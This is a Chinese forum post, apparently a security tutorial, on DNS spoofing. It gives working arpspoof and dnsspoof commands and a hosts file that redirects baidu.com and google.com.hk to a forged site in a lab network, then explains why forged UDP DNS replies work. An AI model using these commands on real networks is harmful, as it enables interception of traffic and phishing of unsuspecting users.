搜索
查看: 2317|回复: 0

dnsspoof dns欺骗教程

[复制链接]

570

主题

837

帖子

2135

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2135

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-4-15 07:50:38 | 显示全部楼层 |阅读模式
  • 攻击环境
  • 攻击者(kali linux):10.10.10.1
  • 攻击目标:10.10.10.2
  • 默认网关:10.10.10.254
  • DNS服务器: 8.8.8.8
  • 伪造网站: 10.10.10.3
  • 攻击步骤

先进行arp欺骗,以中转攻击目标的所有上网流量
echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.10.10.2 10.10.10.254
arpspoof -i eth0 -t 10.10.10.254 10.10.10.2
按照hosts文件格式,创建一个dnsspoof.hosts文件, 当受害者请求该文件中的域名解析时,我们就返回给他一个伪造的IP地址,让其访问我们伪造的网站。
cat dnsspoof.hosts
10.10.10.3 .baidu.com
10.10.10.3
.google.com.hk
执行dnsspoof, -f指定hosts文件,host 10.10.10.2 and udp port 53 遵从tcpdump流量过滤规则
dnsspoof -i eth0 -f dnsspoof.hosts host 10.10.10.2 and udp port 53
这样当攻击目标10.10.10.2访问baidu.com或者google.com.hk时,受害者访问的实际上是10.10.10.3指定的网站。
通过抓包分析,dnsspoof的原理如下
由于DNS协议使用是传输层协议是UDP协议, 这样无需像TCP那样建立连接就可以轻松的伪造应答包,包括源IP. 10.10.10.2发送DNS 查询包问DNS服务器www.baidu.com的IP地址是多少? 10.10.10.1装作DNS服务器(伪造IP)向攻击目标发送一个DNS响应包说www.baidu.com的IP地址是10.10.10.3

有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表